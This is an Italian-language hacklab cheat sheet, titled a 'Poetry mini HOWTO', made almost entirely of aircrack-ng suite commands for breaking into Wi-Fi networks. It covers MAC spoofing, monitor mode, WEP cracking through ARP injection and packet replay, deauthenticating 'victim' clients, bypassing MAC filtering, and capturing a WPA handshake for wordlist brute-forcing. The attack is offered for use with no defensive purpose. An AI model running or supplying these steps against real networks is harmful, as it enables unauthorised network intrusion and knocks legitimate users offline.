Da Poetry Hacklab.
#zeld AT freaknet DOT org
____ ___ _____ _____ ______ __
| _ \ / _ \| ____|_ _| _ \ \ / /
| |_) | | | | _| | | | |_) \ V /
| __/| |_| | |___ | | | _ < | |
|_| \___/|_____| |_| |_| \_\|_|
_ _
_ __ ___ (_)_ __ (_)
| '_ ` _ \| | '_ \| |
| | | | | | | | | | |
|_| |_| |_|_|_| |_|_|
_ _ _____ _______ ___
| | | |/ _ \ \ / /_ _/ _ \
| |_| | | | \ \ /\ / / | || | | |
| _ | |_| |\ V V / | || |_| |
|_| |_|\___/ \_/\_/ |_| \___/
__
_ \ \
(_) | |
_ | |
(_) | |
/_/
############Impostare l'interfaccia in "mode monitor"
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac=00:11:22:33:44:55 wifi0
airmon-ng start wifi0
###############Craccare una WEP
#I requisiti necessari:
-Server un client connesso all'AP
-Conoscere BISSID AP tramite kismet (shift + s , shift + b e selezionare la rete da Bucare)
-Conoscere il MAC address di un client Connesso in wifi (Nella stessa finestra aperta tramite selezione del BSSID dell'AP basta dare shift + c per avere il
MAC address dei client connessi)
#Per catturare i pacchetti usare questo comando
airodump-ng --channel <CANALE_AP> --bssid <BSSID_Rete_da_crackare> --write <nome_file_da_scrivere> ath0
#Craccare in poco tempo con un ARP injection
*controllare se il mac filtering e' attivo con questo comando:
aireplay-ng -1 0 -e <target_essid> -a <BISSID_RETE_DA_CRACCKARE> -h MY:MA:CA:DD:RE:SS <interface>
Se risponde che riesce ad allinearsi allora continuare con questo altrimeti vai sotto nella sezione MAC FILTERING abilitato
aireplay-ng -3 -b <AP MAC Address> -h <MAC Address Vittima> INTERFACCIA
#Deautenticare il client un attimo per far partire richieste ARP
aireplay-ng -0 5 -a <Maccaddress AP> -c <Mac Addres_Client_connesso> INTERFACCIA << Serve per deautenticare il client_connesso
#Oppure invece dell' ARP injection usare un
#Interactive Packet Replay al posto del pachet injection classico, questa e' un'altra tecnica
#pero' non e' efficace come l'ARP injection
aireplay-ng -2 -b <AP MAC> -h <Client MAC> -n 100 -p 0841 -c <MAC Address interfaccia attaccante> ath0
#MAC FILTERING ABILITATO
#Deauthentication:
aireplay-ng -0 5 -a <BSSID_RETE_DA_CRACCKARE> -c 00:00:00:00:00:00 <interface>
#Re-injection
aireplay-ng -3 -b <BSSID_RETE_DA_CRACCKARE> -h 00:00:00:00:00:00 <interface>
#Usare in aircrack l'opzione -m <MAC ADDRESS CLIENT> per filtrare i pacchetti
# Vedi come Decriptare tutti i pacchetti catturati con aircrack nella sezione in fondo al documento
##############Craccare la WPA: l'unico attacco: deautentication.
#L'occorrente
* Mac Address del pc Attaccante
* Mac Address del client connesso all' AP
* Mac Address(BSSID) dell' AP
* ESSID dell'AP
* Canale dell'AP
* Interfaccia attaccante
#Portare l'interfaccia in "Mode Monitor" come fatto in precedenza ma con una variante
airmon-ng stop ath0
maccanger --mac=00:11:22:33:44:55 wifi0
airmon-ng start wifi0 N Dove N= Canale access point
#Lanciare Airodump in maniera da catturare i pacchetti Handshake
airodump-ng -c <CANALE AP> --bssid <BSSID AP> -w <NOMEFILE> ath0
N.B.: Non bisogna usare l'opzione --ivs
#Tramite airodump e' possibile vedere se vi sono client connessi, e vedremo sotto
BSSID STATION PWR Lost Packets Probes
<MAC AP> <MAC CLIENT> etc....
tutti i client connessi..
#A questo punto scegliere tra tutti un client e deautenticarlo con questo comando:
aireplay-ng -0 1 -a <BSSID AP> -c <MAC CLIENT> ath0
opp.
aireplay-ng -0 5 -a <BSSID AP> -c <MAC CLIENT> ath0
#A questo punto usare un bruteforce per trovare la chiave dagli handshake
aircrack-ng -a 2 -b <BSSID AP> -w /path/to/wordlist *.cap
#Se questo comando ci risponde
No valid WPA handshakes found.
#Allora aspettare in ascolto che un client si autentichi o deautenticare il client aspettando che si riautentichi
#######Decriptare i pacchetti Catturati
# aspettiamo 200.000 pacchetti per una chiave WEP 64bit, 500.000 per una WEP 128bit e 1.000.000/2.000.000 e oltre per una WEP 256bit
aircrack-ng <file_name>.cap
# Con l'opzione -a intendiamo il tipo di attacco:
-a 1 e' un attacco da usare con la wep
-a 2 e' un attacco da usare con la WPA-PSK
#In piu' possiamo specificare il fattore di bruteforce con -f e di default e' 2
##Bruteforce
aircrack-ng -a 2 -b <BSSID AP> -w /path/to/wordlist *.cap
* -a 1 : forces a WEP attack mode (2 forces WPA)
* either -b for the bssid or -e for the essid : whichever is easier to type but I like using a BSSID because its more unique.
* -n 64 or -n 128 : WEP key length, omit if not known by now.
So our command will look like:
aircrack-ng -a 1 -b <BSSID_RETE_DA_CRACKARE> -n 128 NOME_FILE.ivs
#N.B.: Se si e' fatto un attacco di tipo Packet Injection e si sono catturati sia pacchetti che ivs allora si puo' usare l'attacco PWT con l'opzione -z
aircrack-ng -a 1 -z -b <BSSID_RETE_DA_CRACKARE> -n 128 * con * intendiamo tutti i pacchetti catturati
#Per velocizzare il cracking della chiave si puo supporre una chiave a 64 bit (-n 64) e se non si ottengono risultati si puo supporre una chiave a 128 bit (-n 128)
#via via poi a 256 bit (-n 256)